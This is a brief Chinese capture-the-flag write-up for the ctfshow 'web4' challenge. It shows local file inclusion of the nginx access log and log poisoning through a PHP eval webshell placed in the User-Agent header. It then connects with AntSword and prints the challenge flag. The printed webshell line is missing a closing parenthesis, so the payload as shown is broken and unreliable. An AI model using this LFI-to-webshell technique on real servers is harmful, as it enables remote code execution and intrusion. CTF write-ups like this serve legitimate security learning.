ctfshow-web4

ctfshow-web4

 

 

 打开之后发现和web3有点像,但是用之前的方法做不出来了

ctfshow-web4

 

 

传参url=/var/log/nginx/access.log获取日志目录

ctfshow-web4

 

 

 使用burpsuite抓包

在User-Agent中加入一句话木马

<?php @eval($_POST['a'];?>

ctfshow-web4

 

 

使用蚁剑连接

ctfshow-web4

 

得到flag

ctfshow-web4

 

 ctfshow{f755138b-0c50-4507-9cb2-67835c95ae08}

 

上一篇:强化学习&opf


下一篇:Window/linux(docker) 单台宿主机部署多个Jenkins节点